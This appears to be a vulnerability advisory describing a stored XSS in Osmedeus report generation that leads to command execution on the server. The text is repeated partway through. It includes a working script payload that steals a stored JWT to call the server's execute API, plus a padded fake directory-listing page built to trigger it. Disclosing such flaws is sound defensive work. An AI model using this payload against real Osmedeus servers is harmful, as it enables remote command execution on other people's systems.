Summary
XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
Details
When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the general-template.md
template.
<p align="center">
<a href="https://www.osmedeus.org"><img alt="Osmedeus" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="140" /></a>
<br />
<br />
<strong>Execute Summary Generated by Osmedeus {{Version}} at <em>{{CurrentDay}}</em></strong>
<p align="center">
<a href="https://docs.osmedeus.org/"><img src="https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge&logo=GitBook&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://docs.osmedeus.org/donation/"><img src="https://img.shields.io/badge/Donation-0078D4?style=for-the-badge&logo=GitHub-Sponsors&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://twitter.com/OsmedeusEngine"><img src="https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge&logo=Twitter&logoColor=39ff14&labelColor=black&color=black"></a>
</p>
</p>
## Scan Information
<scanInfo />
***
## 🚀 Subdomains
<content src="{{Output}}/subdomain/final-{{Workspace}}.txt" shorten=true />
***
## 🌐 HTTP Fingerprint
<content src="{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt" />
***
## 🐞 Vulnerability
### List of Vulnerability Reports
- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)
- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)
- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)
### Jaeles Scan
<content src="{{Output}}/vuln/active/jaeles-summary.txt" />
<content src="{{Output}}/vuln/sensitive/jaeles-summary.txt" />
***
### Nuclei Scan
<content src="{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt" />
***
## 🕷️ Spider Content
<content src="{{Output}}/linkfinding/links-{{Workspace}}.txt"/>
***
## 📃 Content Discovery
<content src="{{Output}}/directory/unique-beautify-{{Workspace}}.txt" />
***
## 🔍 Port Scan
<content src="{{Output}}/portscan/open-ports.txt" />
***
The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS
The issue starts with processing the tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
The condition to enter this if branch must meet one of the following cases:
- Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
- len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
- It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on tags ⇒ We can create custom payloads by leveraging this mechanism."
<! -- Fake Index Content -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="?abc=<script>alert(1)</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
- Easily bypass the condition len(fileContent) > r.Opt.MDCodeBlockLimit
- Spider is a module within the general workflow ⇒ a default workflow that is most commonly used
PoC
https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>
File index payload
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="675559605-1278d133b090b74129f65f6d108d2c83.pdf">675559605-1278d133b090b74129f65f6d108d2c83.pdf</a></li>
<li><a href="959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe">959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe</a></li>
<li><a href="%5BMS-DOCX%5D-240416.docx">[MS-DOCX]-240416.docx</a></li>
<li><a href="AnyDesk.exe">AnyDesk.exe</a></li>
<li><a href="Attachment.zip">Attachment.zip</a></li>
<li><a href="barker.tar">barker.tar</a></li>
<li><a href="c1awptpm_1721182413858.pdf">c1awptpm_1721182413858.pdf</a></li>
<li><a href="cacert.der">cacert.der</a></li>
<li><a href="caido-desktop-logs-1729480323.zip">caido-desktop-logs-1729480323.zip</a></li>
<li><a href="caido-desktop-v0.41.0-win-x86_64.exe">caido-desktop-v0.41.0-win-x86_64.exe</a></li>
<li><a href="caido-desktop-v0.42.0-win-x86_64.exe">caido-desktop-v0.42.0-win-x86_64.exe</a></li>
<li><a href="cdd">cdd</a></li>
<li><a href="CentOS-7-live-GNOME-x86_64.iso">CentOS-7-live-GNOME-x86_64.iso</a></li>
<li><a href="chrome-integrate.zip">chrome-integrate.zip</a></li>
<li><a href="ChromeSetup.exe">ChromeSetup.exe</a></li>
<li><a href="Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf">Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf</a></li>
<li><a href="CxSAST.950.Release.Setup_9.5.0.100.7z">CxSAST.950.Release.Setup_9.5.0.100.7z</a></li>
<li><a href="C%C3%81C%20QUY%20%C4%90%E1%BB%8ANH%20%26%20TI%C3%8AU%20CHU%E1%BA%A8N%20C%E1%BA%A6N%20BI%E1%BA%BET%20CHO%20DOANH%20NGHI%E1%BB%86P%20NH%E1%BB%B0A%20XU%E1%BA%A4T%20KH%E1%BA%A8U%20V%C3%80O%20EU.pdf">CÁC QUY ĐỊNH & TIÊU CHUẨN CẦN BIẾT CHO DOANH NGHIỆP NHỰA XUẤT KHẨU VÀO EU.pdf</a></li>
<li><a href="Danh%20sach%20may%20chu%20T18.xlsx">Danh sach may chu T18.xlsx</a></li>
<li><a href="de4dot-net45.zip">de4dot-net45.zip</a></li>
<li><a href="de4dot-netcoreapp3.1.zip">de4dot-netcoreapp3.1.zip</a></li>
<li><a href="desktop.ini">desktop.ini</a></li>
<li><a href="disk-1.KkwpoIcO.vmdk.part">disk-1.KkwpoIcO.vmdk.part</a></li>
<li><a href="disk-1.vmdk">disk-1.vmdk</a></li>
<li><a href="dist.zip">dist.zip</a></li>
<li><a href="dnSpy-net-win64.zip">dnSpy-net-win64.zip</a></li>
<li><a href="doc.9.1.0.rar">doc.9.1.0.rar</a></li>
<li><a href="download">download</a></li>
<li><a href="Earned_Achievements_2024-09-16.pdf">Earned_Achievements_2024-09-16.pdf</a></li>
<li><a href="Eazfuscator.NET%202024.1%20Setup.msi">Eazfuscator.NET 2024.1 Setup.msi</a></li>
<li><a href="flare-ida-master.zip">flare-ida-master.zip</a></li>
<li><a href="gitlab-recovery-codes.txt">gitlab-recovery-codes.txt</a></li>
<li><a href="Hacking%20Rust.pdf">Hacking Rust.pdf</a></li>
<li><a href="Huong%20dan%20cai%20dat%20Oracle%20New.docx">Huong dan cai dat Oracle New.docx</a></li>
<li><a href="ida83_sdk_tools_v2.zip">ida83_sdk_tools_v2.zip</a></li>
<li><a href="ida84_sdk_tools.zip">ida84_sdk_tools.zip</a></li>
<li><a href="IDARustDemangler.py">IDARustDemangler.py</a></li>
<li><a href="idb2pat.py">idb2pat.py</a></li>
<li><a href="incident-notification_26.03.2024-2.pdf">incident-notification_26.03.2024-2.pdf</a></li>
<li><a href="ironword.2024.8.3.nupkg">ironword.2024.8.3.nupkg</a></li>
<li><a href="KCSC_Recruitment.pdf">KCSC_Recruitment.pdf</a></li>
<li><a href="K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx">Kế hoạch đào tạo 05102023 (2).xlsx</a></li>
<li><a href="linkfinder.json">linkfinder.json</a></li>
<li><a href="Margherita%20Report%20Demo_report.pdf">Margherita Report Demo_report.pdf</a></li>
<li><a href="Mastering_Malware_Analysis.pdf">Mastering_Malware_Analysis.pdf</a></li>
<li><a href="M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx">Mẫu-Danh sach Quan ly Backup-CS_v1.xlsx</a></li>
<li><a href="node-v20.17.0-x64.msi">node-v20.17.0-x64.msi</a></li>
<li><a href="OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip">OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip</a></li>
<li><a href="OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf">OSED Notes Study Overview by Joas Antonio.pdf</a></li>
<li><a href="PAKD%20paytech.xlsx">PAKD paytech.xlsx</a></li>
<li><a href="password">password</a></li>
<li><a href="patriotctf.rar">patriotctf.rar</a></li>
<li><a href="pestudio-9.59.zip">pestudio-9.59.zip</a></li>
<li><a href="photo_2023-01-04_09-04-52.jpg">photo_2023-01-04_09-04-52.jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55%20%282%29.jpg">photo_2023-01-04_09-04-55 (2).jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55.jpg">photo_2023-01-04_09-04-55.jpg</a></li>
<li><a href="photo_2024-09-27_09-47-55.jpg">photo_2024-09-27_09-47-55.jpg</a></li>
<li><a href="Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx">Phụ lục 5.xlsx</a></li>
<li><a href="plugin.zip">plugin.zip</a></li>
<li><a href="processhacker-2.39-setup.exe">processhacker-2.39-setup.exe</a></li>
<li><a href="publications.pdf">publications.pdf</a></li>
<li><a href="pwnfox.json">pwnfox.json</a></li>
<li><a href="pykd_ext_2.0.0.25.zip">pykd_ext_2.0.0.25.zip</a></li>
<li><a href="rp-win.zip">rp-win.zip</a></li>
<li><a href="rs.zip">rs.zip</a></li>
<li><a href="rustup-init.exe">rustup-init.exe</a></li>
<li><a href="setup.exe">setup.exe</a></li>
<li><a href="Single%20Page%20Applications%20with%20Vue.js.rar">Single Page Applications with Vue.js.rar</a></li>
<li><a href="Skilled_Person_Registration_Template_2pWPpnl.xlsx">Skilled_Person_Registration_Template_2pWPpnl.xlsx</a></li>
<li><a href="snapshot_2024-10-03_12-14.zip">snapshot_2024-10-03_12-14.zip</a></li>
<li><a href="spire.doc.12.7.3.nupkg">spire.doc.12.7.3.nupkg</a></li>
<li><a href="spire.doc.9.1.0.nupkg">spire.doc.9.1.0.nupkg</a></li>
<li><a href="spire.doc.cpp.11.4.5.nupkg">spire.doc.cpp.11.4.5.nupkg</a></li>
<li><a href="sticker.webm">sticker.webm</a></li>
<li><a href="Telegram%20Desktop/">Telegram Desktop/</a></li>
<li><a href="test">test</a></li>
<li><a href="test.php">test.php</a></li>
<li><a href="test2">test2</a></li>
<li><a href="test1.php">test1.php</a></li>
<li><a href="test2.php">test2.php</a></li>
<li><a href="test3.php">test3.php</a></li>
<li><a href="test4.php">test4.php</a></li>
<li><a href="test5.php">test5.php</a></li>
<li><a href="test6.php">test6.php</a></li>
<li><a href="test7.php">test7.php</a></li>
<li><a href="test8.php">test8.php</a></li>
<li><a href="test9.php">test9.php</a></li>
<li><a href="test10.php">test10.php</a></li>
<li><a href="test11.php">test11.php</a></li>
<li><a href="test12.php">test12.php</a></li>
<li><a href="test13.php">test13.php</a></li>
<li><a href="test14.php">test14.php</a></li>
<li><a href="test15.php">test15.php</a></li>
<li><a href="test16.php">test16.php</a></li>
<li><a href="test17.php">test17.php</a></li>
<li><a href="test18.php">test18.php</a></li>
<li><a href="test19.php">test19.php</a></li>
<li><a href="test20.php">test20.php</a></li>
<li><a href="test21.php">test21.php</a></li>
<li><a href="test22.php">test22.php</a></li>
<li><a href="test23.php">test23.php</a></li>
<li><a href="test24.php">test24.php</a></li>
<li><a href="test25.php">test25.php</a></li>
<li><a href="test26.php">test26.php</a></li>
<li><a href="test27.php">test27.php</a></li>
<li><a href="test28.php">test28.php</a></li>
<li><a href="test29.php">test29.php</a></li>
<li><a href="test30.php">test30.php</a></li>
<li><a href="test31.php">test31.php</a></li>
<li><a href="test32.php">test32.php</a></li>
<li><a href="test33.php">test33.php</a></li>
<li><a href="test34.php">test34.php</a></li>
<li><a href="test35.php">test35.php</a></li>
<li><a href="test36.php">test36.php</a></li>
<li><a href="test37.php">test37.php</a></li>
<li><a href="test38.php">test38.php</a></li>
<li><a href="test39.php">test39.php</a></li>
<li><a href="test40.php">test40.php</a></li>
<li><a href="test41.php">test41.php</a></li>
<li><a href="test42.php">test42.php</a></li>
<li><a href="test43.php">test43.php</a></li>
<li><a href="test44.php">test44.php</a></li>
<li><a href="test45.php">test45.php</a></li>
<li><a href="test46.php">test46.php</a></li>
<li><a href="test47.php">test47.php</a></li>
<li><a href="test48.php">test48.php</a></li>
<li><a href="test49.php">test49.php</a></li>
<li><a href="test50.php">test50.php</a></li>
<li><a href="test51.php">test51.php</a></li>
<li><a href="test52.php">test52.php</a></li>
<li><a href="test53.php">test53.php</a></li>
<li><a href="test54.php">test54.php</a></li>
<li><a href="test55.php">test55.php</a></li>
<li><a href="test56.php">test56.php</a></li>
<li><a href="test57.php">test57.php</a></li>
<li><a href="test58.php">test58.php</a></li>
<li><a href="test59.php">test59.php</a></li>
<li><a href="test60.php">test60.php</a></li>
<li><a href="test61.php">test61.php</a></li>
<li><a href="test62.php">test62.php</a></li>
<li><a href="test63.php">test63.php</a></li>
<li><a href="test64.php">test64.php</a></li>
<li><a href="test65.php">test65.php</a></li>
<li><a href="test66.php">test66.php</a></li>
<li><a href="test67.php">test67.php</a></li>
<li><a href="test68.php">test68.php</a></li>
<li><a href="test69.php">test69.php</a></li>
<li><a href="test70.php">test70.php</a></li>
<li><a href="test71.php">test71.php</a></li>
<li><a href="test72.php">test72.php</a></li>
<li><a href="test73.php">test73.php</a></li>
<li><a href="test74.php">test74.php</a></li>
<li><a href="test75.php">test75.php</a></li>
<li><a href="test76.php">test76.php</a></li>
<li><a href="test77.php">test77.php</a></li>
<li><a href="test78.php">test78.php</a></li>
<li><a href="test79.php">test79.php</a></li>
<li><a href="test80.php">test80.php</a></li>
<li><a href="test81.php">test81.php</a></li>
<li><a href="test82.php">test82.php</a></li>
<li><a href="test83.php">test83.php</a></li>
<li><a href="test84.php">test84.php</a></li>
<li><a href="test85.php">test85.php</a></li>
<li><a href="test86.php">test86.php</a></li>
<li><a href="test87.php">test87.php</a></li>
<li><a href="test88.php">test88.php</a></li>
<li><a href="test89.php">test89.php</a></li>
<li><a href="test90.php">test90.php</a></li>
<li><a href="test91.php">test91.php</a></li>
<li><a href="test92.php">test92.php</a></li>
<li><a href="test93.php">test93.php</a></li>
<li><a href="test94.php">test94.php</a></li>
<li><a href="test95.php">test95.php</a></li>
<li><a href="test96.php">test96.php</a></li>
<li><a href="test97.php">test97.php</a></li>
<li><a href="test98.php">test98.php</a></li>
<li><a href="test99.php">test99.php</a></li>
<li><a href="test100.php">test100.php</a></li>
<li><a href="test101.php">test101.php</a></li>
<li><a href="test102.php">test102.php</a></li>
<li><a href="test103.php">test103.php</a></li>
<li><a href="test104.php">test104.php</a></li>
<li><a href="test105.php">test105.php</a></li>
<li><a href="test106.php">test106.php</a></li>
<li><a href="test107.php">test107.php</a></li>
<li><a href="test108.php">test108.php</a></li>
<li><a href="test109.php">test109.php</a></li>
<li><a href="test110.php">test110.php</a></li>
<li><a href="test111.php">test111.php</a></li>
<li><a href="test112.php">test112.php</a></li>
<li><a href="test113.php">test113.php</a></li>
<li><a href="test114.php">test114.php</a></li>
<li><a href="test115.php">test115.php</a></li>
<li><a href="test116.php">test116.php</a></li>
<li><a href="test117.php">test117.php</a></li>
<li><a href="test118.php">test118.php</a></li>
<li><a href="test119.php">test119.php</a></li>
<li><a href="test120.php">test120.php</a></li>
<li><a href="test121.php">test121.php</a></li>
<li><a href="test122.php">test122.php</a></li>
<li><a href="test123.php">test123.php</a></li>
<li><a href="test124.php">test124.php</a></li>
<li><a href="test125.php">test125.php</a></li>
<li><a href="test126.php">test126.php</a></li>
<li><a href="test127.php">test127.php</a></li>
<li><a href="test128.php">test128.php</a></li>
<li><a href="test129.php">test129.php</a></li>
<li><a href="test130.php">test130.php</a></li>
<li><a href="test131.php">test131.php</a></li>
<li><a href="test132.php">test132.php</a></li>
<li><a href="test133.php">test133.php</a></li>
<li><a href="test134.php">test134.php</a></li>
<li><a href="test135.php">test135.php</a></li>
<li><a href="test136.php">test136.php</a></li>
<li><a href="test137.php">test137.php</a></li>
<li><a href="test138.php">test138.php</a></li>
<li><a href="test139.php">test139.php</a></li>
<li><a href="test140.php">test140.php</a></li>
<li><a href="test141.php">test141.php</a></li>
<li><a href="test142.php">test142.php</a></li>
<li><a href="test143.php">test143.php</a></li>
<li><a href="test144.php">test144.php</a></li>
<li><a href="test145.php">test145.php</a></li>
<li><a href="test146.php">test146.php</a></li>
<li><a href="test147.php">test147.php</a></li>
<li><a href="test148.php">test148.php</a></li>
<li><a href="test149.php">test149.php</a></li>
<li><a href="test150.php">test150.php</a></li>
<li><a href="test151.php">test151.php</a></li>
<li><a href="test152.php">test152.php</a></li>
<li><a href="test153.php">test153.php</a></li>
<li><a href="test154.php">test154.php</a></li>
<li><a href="test155.php">test155.php</a></li>
<li><a href="test156.php">test156.php</a></li>
<li><a href="test157.php">test157.php</a></li>
<li><a href="test158.php">test158.php</a></li>
<li><a href="test159.php">test159.php</a></li>
<li><a href="test160.php">test160.php</a></li>
<li><a href="test161.php">test161.php</a></li>
<li><a href="test162.php">test162.php</a></li>
<li><a href="test163.php">test163.php</a></li>
<li><a href="test164.php">test164.php</a></li>
<li><a href="test165.php">test165.php</a></li>
<li><a href="test166.php">test166.php</a></li>
<li><a href="test167.php">test167.php</a></li>
<li><a href="test168.php">test168.php</a></li>
<li><a href="test169.php">test169.php</a></li>
<li><a href="test170.php">test170.php</a></li>
<li><a href="test171.php">test171.php</a></li>
<li><a href="test172.php">test172.php</a></li>
<li><a href="test173.php">test173.php</a></li>
<li><a href="test174.php">test174.php</a></li>
<li><a href="test175.php">test175.php</a></li>
<li><a href="test176.php">test176.php</a></li>
<li><a href="test177.php">test177.php</a></li>
<li><a href="test178.php">test178.php</a></li>
<li><a href="test179.php">test179.php</a></li>
<li><a href="test180.php">test180.php</a></li>
<li><a href="test181.php">test181.php</a></li>
<li><a href="test182.php">test182.php</a></li>
<li><a href="test183.php">test183.php</a></li>
<li><a href="test184.php">test184.php</a></li>
<li><a href="test185.php">test185.php</a></li>
<li><a href="test186.php">test186.php</a></li>
<li><a href="test187.php">test187.php</a></li>
<li><a href="test188.php">test188.php</a></li>
<li><a href="test189.php">test189.php</a></li>
<li><a href="test190.php">test190.php</a></li>
<li><a href="test191.php">test191.php</a></li>
<li><a href="test192.php">test192.php</a></li>
<li><a href="test193.php">test193.php</a></li>
<li><a href="test194.php">test194.php</a></li>
<li><a href="test195.php">test195.php</a></li>
<li><a href="test196.php">test196.php</a></li>
<li><a href="test197.php">test197.php</a></li>
<li><a href="test198.php">test198.php</a></li>
<li><a href="test199.php">test199.php</a></li>
<li><a href="test200.php">test200.php</a></li>
<li><a href="test201.php">test201.php</a></li>
<li><a href="test202.php">test202.php</a></li>
<li><a href="test203.php">test203.php</a></li>
<li><a href="test204.php">test204.php</a></li>
<li><a href="test205.php">test205.php</a></li>
<li><a href="test206.php">test206.php</a></li>
<li><a href="test207.php">test207.php</a></li>
<li><a href="test208.php">test208.php</a></li>
<li><a href="test209.php">test209.php</a></li>
<li><a href="test210.php">test210.php</a></li>
<li><a href="test211.php">test211.php</a></li>
<li><a href="test212.php">test212.php</a></li>
<li><a href="test213.php">test213.php</a></li>
<li><a href="test214.php">test214.php</a></li>
<li><a href="test215.php">test215.php</a></li>
<li><a href="test216.php">test216.php</a></li>
<li><a href="test217.php">test217.php</a></li>
<li><a href="test218.php">test218.php</a></li>
<li><a href="test219.php">test219.php</a></li>
<li><a href="test220.php">test220.php</a></li>
<li><a href="test221.php">test221.php</a></li>
<li><a href="test222.php">test222.php</a></li>
<li><a href="test223.php">test223.php</a></li>
<li><a href="test224.php">test224.php</a></li>
<li><a href="test225.php">test225.php</a></li>
<li><a href="test226.php">test226.php</a></li>
<li><a href="test227.php">test227.php</a></li>
<li><a href="test228.php">test228.php</a></li>
<li><a href="test229.php">test229.php</a></li>
<li><a href="test230.php">test230.php</a></li>
<li><a href="test231.php">test231.php</a></li>
<li><a href="test232.php">test232.php</a></li>
<li><a href="test233.php">test233.php</a></li>
<li><a href="test234.php">test234.php</a></li>
<li><a href="test235.php">test235.php</a></li>
<li><a href="test236.php">test236.php</a></li>
<li><a href="test237.php">test237.php</a></li>
<li><a href="test238.php">test238.php</a></li>
<li><a href="test239.php">test239.php</a></li>
<li><a href="test240.php">test240.php</a></li>
<li><a href="test241.php">test241.php</a></li>
<li><a href="test242.php">test242.php</a></li>
<li><a href="test243.php">test243.php</a></li>
<li><a href="test244.php">test244.php</a></li>
<li><a href="test245.php">test245.php</a></li>
<li><a href="test246.php">test246.php</a></li>
<li><a href="test247.php">test247.php</a></li>
<li><a href="test248.php">test248.php</a></li>
<li><a href="test249.php">test249.php</a></li>
<li><a href="test250.php">test250.php</a></li>
<li><a href="test251.php">test251.php</a></li>
<li><a href="test252.php">test252.php</a></li>
<li><a href="test253.php">test253.php</a></li>
<li><a href="test254.php">test254.php</a></li>
<li><a href="test255.php">test255.php</a></li>
<li><a href="test256.php">test256.php</a></li>
<li><a href="test257.php">test257.php</a></li>
<li><a href="test258.php">test258.php</a></li>
<li><a href="test259.php">test259.php</a></li>
<li><a href="test260.php">test260.php</a></li>
<li><a href="test261.php">test261.php</a></li>
<li><a href="test262.php">test262.php</a></li>
<li><a href="test263.php">test263.php</a></li>
<li><a href="test264.php">test264.php</a></li>
<li><a href="test265.php">test265.php</a></li>
<li><a href="test266.php">test266.php</a></li>
<li><a href="test267.php">test267.php</a></li>
<li><a href="test268.php">test268.php</a></li>
<li><a href="test269.php">test269.php</a></li>
<li><a href="test270.php">test270.php</a></li>
<li><a href="test271.php">test271.php</a></li>
<li><a href="test272.php">test272.php</a></li>
<li><a href="test273.php">test273.php</a></li>
<li><a href="test274.php">test274.php</a></li>
<li><a href="test275.php">test275.php</a></li>
<li><a href="test276.php">test276.php</a></li>
<li><a href="test277.php">test277.php</a></li>
<li><a href="test278.php">test278.php</a></li>
<li><a href="test279.php">test279.php</a></li>
<li><a href="test280.php">test280.php</a></li>
<li><a href="test281.php">test281.php</a></li>
<li><a href="test282.php">test282.php</a></li>
<li><a href="test283.php">test283.php</a></li>
<li><a href="test284.php">test284.php</a></li>
<li><a href="test285.php">test285.php</a></li>
<li><a href="test286.php">test286.php</a></li>
<li><a href="test287.php">test287.php</a></li>
<li><a href="test288.php">test288.php</a></li>
<li><a href="test289.php">test289.php</a></li>
<li><a href="test290.php">test290.php</a></li>
<li><a href="test291.php">test291.php</a></li>
<li><a href="test292.php">test292.php</a></li>
<li><a href="test293.php">test293.php</a></li>
<li><a href="test294.php">test294.php</a></li>
<li><a href="test295.php">test295.php</a></li>
<li><a href="test296.php">test296.php</a></li>
<li><a href="test297.php">test297.php</a></li>
<li><a href="test298.php">test298.php</a></li>
<li><a href="test299.php">test299.php</a></li>
<li><a href="test300.php">test300.php</a></li>
<li><a href="The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf">The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf</a></li>
<li><a href="ThuHo.rar">ThuHo.rar</a></li>
<li><a href="Vue.js%20Master%20Class%202024%20Edition.rar">Vue.js Master Class 2024 Edition.rar</a></li>
<li><a href="VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar">VueSchool - The Vue.js 3 Masterclass (2024-4).rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar</a></li>
<li><a href="win%20server%202016%281%29.ovf">win server 2016(1).ovf</a></li>
<li><a href="win%20server%202016.ovf">win server 2016.ovf</a></li>
<li><a href="?abc=<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
Impact
Execute command on server
References
Summary
XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
Details
When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the
general-template.md
template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS
The issue starts with processing the tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
The condition to enter this if branch must meet one of the following cases:
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
PoC
https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>
File index payload
Impact
Execute command on server
References